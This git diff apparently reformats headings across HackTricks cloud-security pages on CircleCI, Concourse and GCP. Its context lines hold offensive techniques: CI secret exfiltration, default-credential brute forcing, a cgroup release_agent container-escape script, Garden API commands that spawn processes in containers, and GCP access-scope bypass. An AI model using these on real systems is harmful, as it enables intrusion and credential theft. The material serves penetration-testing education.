A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
@@ -989,7 +987,7 @@ User pools provide:
* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
* Customized workflows and user migration through AWS Lambda triggers.
-### **Identity pools**
+## **Identity pools**
With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools:
diff --git a/cloud-security/circleci.md b/cloud-security/circleci.md
index 26383dcf..a31ab05a 100644
--- a/cloud-security/circleci.md
+++ b/cloud-security/circleci.md
@@ -17,28 +17,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# CircleCI
-
-## Basic Information
+# Basic Information
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
-## Permissions
+# Permissions
**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
-## Env Variables & Secrets
+# Env Variables & Secrets
According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are different ways to **load values in environment variables** inside a workflow.
-### Built-in env variables
+## Built-in env variables
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
-### Clear text
+## Clear text
You can declare them in clear text inside a **command**:
@@ -82,7 +80,7 @@ jobs:
SECRET: A secret
```
-### Project Secrets
+## Project Secrets
These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_
@@ -93,7 +91,7 @@ You can see them **declared in** _https://app.circleci.com/settings/project/gith
The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
{% endhint %}
-### Context Secrets
+## Context Secrets
These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
@@ -104,17 +102,17 @@ However, note that a different group (instead of All members) can be **selected
This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
{% endhint %}
-## Attacks
+# Attacks
-### Search Clear Text Secrets
+## Search Clear Text Secrets
If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
-### Secret Env Vars & Context enumeration
+## Secret Env Vars & Context enumeration
Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_.
-### Exfiltrate Project secrets
+## Exfiltrate Project secrets
{% hint style="warning" %}
In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
@@ -174,7 +172,7 @@ workflows:
- exfil-env
```
-### Exfiltrate Context Secrets
+## Exfiltrate Context Secrets
You need to **specify the context name** (this will also exfiltrate the project secrets):
@@ -235,7 +233,7 @@ workflows:
Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
{% endhint %}
-### Escape to Cloud
+## Escape to Cloud
**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
@@ -264,7 +262,7 @@ jobs:
version: 19.03.13
```
-### Persistence
+## Persistence
* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
* _https://app.circleci.com/settings/user/tokens_
diff --git a/cloud-security/cloud-security-review.md b/cloud-security/cloud-security-review.md
index 581e0460..ad072f38 100644
--- a/cloud-security/cloud-security-review.md
+++ b/cloud-security/cloud-security-review.md
@@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Cloud Security Review
-
**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud)
-## Generic tools
+# Generic tools
There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
-### [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
+## [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
@@ -33,7 +31,7 @@ AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
pip3 install scoutsuite
```
-### [cs-suite](https://github.com/SecurityFTW/cs-suite)
+## [cs-suite](https://github.com/SecurityFTW/cs-suite)
AWS, GCP, Azure, DigitalOcean
@@ -46,11 +44,11 @@ pip install -r requirements.txt
python cs.py --help
```
-### Nessus
+## Nessus
Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
-### Common Sense
+## Common Sense
Take a look to the **network access rules** and detect if the services are correctly protected:
@@ -59,7 +57,7 @@ Take a look to the **network access rules** and detect if the services are corre
* Unprotected admin consoles?
* In general, check that all services are correctly protected depending on their needs
-## Azure
+# Azure
Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\
To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
@@ -70,7 +68,7 @@ Then, run `az login` to login. Note the **account information** and **token** wi
Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance-> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\
\_\_If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure).
-### Run scanners
+## Run scanners
Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**.
@@ -91,11 +89,11 @@ pip3 install azure-cis-scanner #Install
azscan #Run, login before with `az login`
```
-### Attack Graph
+## Attack Graph
[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
-### More checks
+## More checks
* Check for a **high number of Global Admin** (between 2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview)
* Global admins should have MFA activated. Go to Users and click on Multi-Factor Authentication button.
@@ -117,15 +115,15 @@ azscan #Run, login before with `az login`
_Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_
* **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if anyone is being used. In that case check go through each App checking for "Access Restrictions" and there aren't rules, report it. The access to the app service should be restricted according to the needs.
-## Office365
+# Office365
You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features via the web application.
-## AWS
+# AWS
Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx)
-## GPC
+# GPC
{% content-ref url="gcp-security/" %}
[gcp-security](gcp-security/)
diff --git a/cloud-security/concourse/README.md b/cloud-security/concourse/README.md
index 7a7b11be..d06f96e7 100644
--- a/cloud-security/concourse/README.md
+++ b/cloud-security/concourse/README.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Concourse
-
**Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time based, when something happens...)**
-## Concourse Architecture
+# Concourse Architecture
Learn how the concourse environment is structured in:
@@ -29,7 +27,7 @@ Learn how the concourse environment is structured in:
[concourse-architecture.md](concourse-architecture.md)
{% endcontent-ref %}
-## Run Concourse Locally
+# Run Concourse Locally
Learn how you can run a concourse environment locally to do your own tests in:
@@ -37,7 +35,7 @@ Learn how you can run a concourse environment locally to do your own tests in:
[concourse-lab-creation.md](concourse-lab-creation.md)
{% endcontent-ref %}
-## Enumerate & Attack Concourse
+# Enumerate & Attack Concourse
Learn how you can enumerate the concourse environment and abuse it in:
@@ -45,7 +43,7 @@ Learn how you can enumerate the concourse environment and abuse it in:
[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md)
{% endcontent-ref %}
-## References
+# References
* [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker)
diff --git a/cloud-security/concourse/concourse-architecture.md b/cloud-security/concourse/concourse-architecture.md
index 37cc5331..029cf346 100644
--- a/cloud-security/concourse/concourse-architecture.md
+++ b/cloud-security/concourse/concourse-architecture.md
@@ -16,19 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## Concourse Architecture
-### Architecture
+# Architecture
 (1) (1).png>)
-#### ATC: web UI & build scheduler
+## ATC: web UI & build scheduler
The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
-#### TSA: worker registration & forwarding
+## TSA: worker registration & forwarding
The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
@@ -36,7 +35,7 @@ The TSA by **default listens on port `2222`**, and is usually colocated with the
The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
-#### Workers
+## Workers
In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
diff --git a/cloud-security/concourse/concourse-enumeration-and-attacks.md b/cloud-security/concourse/concourse-enumeration-and-attacks.md
index f60bce8b..6bada3af 100644
--- a/cloud-security/concourse/concourse-enumeration-and-attacks.md
+++ b/cloud-security/concourse/concourse-enumeration-and-attacks.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Concourse Enumeration & Attacks
-
-## User Roles & Permissions
+# User Roles & Permissions
Concourse comes with five roles:
@@ -35,14 +33,14 @@ Moreover, the **permissions of the roles owner, member, pipeline-operator and vi
Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
-## Vars & Credential Manager
+# Vars & Credential Manager
In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\
The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The **optional **_**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
-### Static Vars
+## Static Vars
Static vars can be specified in **tasks steps**:
@@ -59,7 +57,7 @@ Or using the following `fly` **arguments**:
* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
-### Credential Management
+## Credential Management
There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports different credential managers:
@@ -78,11 +76,11 @@ Moreover, Concourse supports different credential managers:
Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
{% endhint %}
-## Concourse Enumeration
+# Concourse Enumeration
In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
-### Login and Current User enum
+## Login and Current User enum
* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
* `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
@@ -93,7 +91,7 @@ In order to enumerate a concourse environment you first need to **gather valid c
* Get **role** of the user against the indicated target:
* `fly -t userinfo`
-### Teams & Users
+## Teams & Users
* Get a list of the Teams
* `fly -t teams`
@@ -102,7 +100,7 @@ In order to enumerate a concourse environment you first need to **gather valid c
* Get a list of users
* `fly -t active-users`
-### Pipelines
+## Pipelines
* **List** pipelines:
* `fly -t pipelines -a`
@@ -125,7 +123,7 @@ cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
-### Containers & Workers
+## Containers & Workers
* List **workers**:
* `fly -t workers`
@@ -134,18 +132,18 @@ rm /tmp/secrets.txt
* List **builds** (to see what is running):
* `fly -t builds`
-## Concourse Attacks
+# Concourse Attacks
-### Credentials Brute-Force
+## Credentials Brute-Force
* admin:admin
* test:test
-### Secrets and params enumeration
+## Secrets and params enumeration
In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
-### Session inside running or recently run container
+## Session inside running or recently run container
If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using:
@@ -160,7 +158,7 @@ With these permissions you might be able to:
* Try to **escape** to the node
* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
-### Pipeline Creation/Modification
+## Pipeline Creation/Modification
If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
@@ -195,7 +193,7 @@ With the **modification/creation** of a new pipeline you will be able to:
* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
* **Delete** created pipeline
-### Execute Custom Task
+## Execute Custom Task
This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
@@ -221,7 +219,7 @@ params:
fly -t tutorial execute --privileged --config task_config.yml
```
-### Escaping to the node from privileged task
+## Escaping to the node from privileged task
In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
@@ -241,20 +239,20 @@ echo 1 > /tmp/cgrp/x/notify_on_release
# The host path will look like the following, but you need to change it:
host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"
-## The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
+# The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
#/dev/vda1 on /scratch type ext4 (rw,relatime)
#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)
-## Then next part I think is constant "hostpath-provisioner/default/"
+# Then next part I think is constant "hostpath-provisioner/default/"
-## For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
+# For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
# "concourse-work-dir" is constant
# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API)
# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number)
-## The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
+# The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
# the UID is the part we are looking for
@@ -289,7 +287,7 @@ cat /output
As you might have noticed this is just a [**regular release\_agent escape**](../../linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md#privileged) just modifying the path of the cmd in the node
{% endhint %}
-### Escaping to the node from a Worker container
+## Escaping to the node from a Worker container
A regular release\_agent escape with a minor modification is enough for this:
@@ -320,7 +318,7 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output
```
-### Escaping to the node from the Web container
+## Escaping to the node from the Web container
Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
@@ -360,7 +358,7 @@ select * from teams; #Change the permissions of the users in the teams
select * from users;
```
-### Abusing Garden Service - Not a real Attack
+## Abusing Garden Service - Not a real Attack
{% hint style="warning" %}
This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
@@ -392,7 +390,7 @@ In the previous section we saw how to escape from a privileged container, so if
Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
-#### Getting inside a running privileged container
+### Getting inside a running privileged container
```bash
# Get current container
@@ -404,7 +402,7 @@ curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
# Execute a new process inside a container
-## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
+# In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
@@ -413,7 +411,7 @@ wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
```
-#### Creating a new privileged container
+### Creating a new privileged container
You can very easily create a new container (just run a random UID) and execute something on it:
diff --git a/cloud-security/concourse/concourse-lab-creation.md b/cloud-security/concourse/concourse-lab-creation.md
index aaa3d788..5cb6c9bb 100644
--- a/cloud-security/concourse/concourse-lab-creation.md
+++ b/cloud-security/concourse/concourse-lab-creation.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Concourse Lab Creation
+# Testing Environment
-## Testing Environment
+## Running Concourse
-### Running Concourse
-
-#### With Docker-Compose
+### With Docker-Compose
This docker-compose file simplifies the installation to do some tests with concourse:
@@ -34,7 +32,7 @@ docker-compose up -d
You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
-#### With Kubernetes (Recommended)
+### With Kubernetes (Recommended)
You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
@@ -90,11 +88,11 @@ data:
' | kubectl apply -f -
```
-### Create Pipeline
+## Create Pipeline
A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
-### Steps
+## Steps
Several different type of steps can be used:
@@ -112,7 +110,7 @@ Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concour
Therefore, it's possible to indicate the type of container each step needs to be run in.
-### Simple Pipeline Example
+## Simple Pipeline Example
```yaml
jobs:
@@ -150,11 +148,11 @@ fly -t tutorial intercept --job pipe-name/simple
Check **127.0.0.1:8080** to see the pipeline flow.
-### Bash script with output/input pipeline
+## Bash script with output/input pipeline
It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
-### Triggers
+## Triggers
You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md
index 1d3e7ffb..63cd5df8 100644
--- a/cloud-security/gcp-security/README.md
+++ b/cloud-security/gcp-security/README.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP Security
+# Security concepts
-## Security concepts
-
-### **Resource hierarchy**
+## **Resource hierarchy**
Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
@@ -36,7 +34,7 @@ Organization
A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
-### **IAM Roles**
+## **IAM Roles**
There are **three types** of roles in IAM:
@@ -50,7 +48,7 @@ There are thousands of permissions in GCP. In order to check if a role has a per
**You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.**
-#### Basic roles
+### Basic roles
| Name | Title | Permissions |
| ---------------- | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
@@ -85,11 +83,11 @@ Or to see the IAM policy [assigned to a single Compute Instance](https://cloud.g
gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE]
```
-### **Organization Policies**
+## **Organization Policies**
The IAM policies indicates the permissions principals has over resources via roles which ara assigned granular permissions. Organization policies **restrict how those service can be used or which features are enabled disabled**. This helps in order to improve the least privilege of each resource in the gcp environment.
-### **Terraform IAM Policies, Bindings and Memberships**
+## **Terraform IAM Policies, Bindings and Memberships**
As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam) using terraform with GCP there are different ways to grant a principal access over a resource:
@@ -97,7 +95,7 @@ As defined by terraform in [https://registry.terraform.io/providers/hashicorp/go
* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**.
* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role).
-### **Service accounts**
+## **Service accounts**
Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
@@ -120,7 +118,7 @@ SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com
If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog.
-### **Access scopes**
+## **Access scopes**
The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**.
@@ -159,7 +157,7 @@ This `cloud-platform` scope is what we are really hoping for, as it will allow u
It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
-### Default credentials
+## Default credentials
**Default service account token**
@@ -194,7 +192,7 @@ When using one of Google's official GCP client libraries, the code will automati
Finding the actual **JSON file with the service account credentials** is generally much **more** **desirable** than **relying on the OAuth token** on the metadata server. This is because the raw service account credentials can be activated **without the burden of access scopes** and without the short expiration period usually applied to the tokens.
-### **Networking**
+## **Networking**
Compute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default\_firewall\_rules): allow outbound and deny inbound.
@@ -247,16 +245,16 @@ We've automated this completely using [this python script](https://gitlab.com/gi
* nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)
* masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)
-## Enumeration
+# Enumeration
-### Automatic Tools
+## Automatic Tools
* [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_enum:) Bash script to enumerate a GCP environment using gcloud cli and saving the results in
* [https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation:) Scripts to enumerate high IAM privileges and to escalate privileges in GCP abusing them (I couldn’t make run the enumerate script)
* [https://github.com/lyft/cartography:](https://github.com/lyft/cartography:) Tool to enumerate and print in a graph resources and relations of different cloud platforms
* [https://github.com/RyanJarv/awesome-cloud-sec:](https://github.com/RyanJarv/awesome-cloud-sec:) This is a list of cloud security tools
-### IAM
+## IAM
| Description | Command |
| ---------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------ |
@@ -272,26 +270,26 @@ We've automated this completely using [this python script](https://gitlab.com/gi
| List **custom** **roles** on a project | `gcloud iam roles list --project $PROJECT_ID` |
| List **service accounts** | `gcloud iam service-accounts list` |
-## Unauthenticated Attacks
+# Unauthenticated Attacks
{% content-ref url="gcp-buckets-brute-force-and-privilege-escalation.md" %}
[gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md)
{% endcontent-ref %}
-#### Phishing
+### Phishing
You could **OAuth phish** a user with high privileges.
-#### Dorks
+### Dorks
* **Github**: auth\_provider\_x509\_cert\_url extension:json
-## Generic GCP Security Checklists
+# Generic GCP Security Checklists
* [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/)
* [https://github.com/doitintl/secure-gcp-reference](https://github.com/doitintl/secure-gcp-reference)
-## Local Privilege Escalation / SSH Pivoting
+# Local Privilege Escalation / SSH Pivoting
Supposing that you have compromised a VM in GCP, there are some **GCP privileges** that can allow you to **escalate privileges locally, into other machines and also pivot to other VMs**:
@@ -301,9 +299,9 @@ Supposing that you have compromised a VM in GCP, there are some **GCP privileges
If you have found some [**SSRF vulnerability in a GCP environment check this page**](../../pentesting-web/ssrf-server-side-request-forgery/#6440).
-## GCP Post Exploitation
+# GCP Post Exploitation
-### GCP Interesting Permissions
+## GCP Interesting Permissions
The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to **abuse miss-configured privileges** the compromised account may have. So, the first thing you should do is to enumerate your privileges.
@@ -313,7 +311,7 @@ Moreover, during this enumeration, remember that **permissions can be set at the
[gcp-interesting-permissions](gcp-interesting-permissions/)
{% endcontent-ref %}
-### Bypassing access scopes
+## Bypassing access scopes
When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the computing instance (VM) will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. However, you might be able to **bypass** this limitation and exploit the permissions the compromised account has.
@@ -387,7 +385,7 @@ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN
You should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are **not limited by any instance-level access scopes**. You now have full power to use all of your assigned IAM permissions.
-### Service account impersonation
+## Service account impersonation
Impersonating a service account can be very useful to **obtain new and better privileges**.
@@ -397,7 +395,7 @@ There are three ways in which you can [impersonate another service account](http
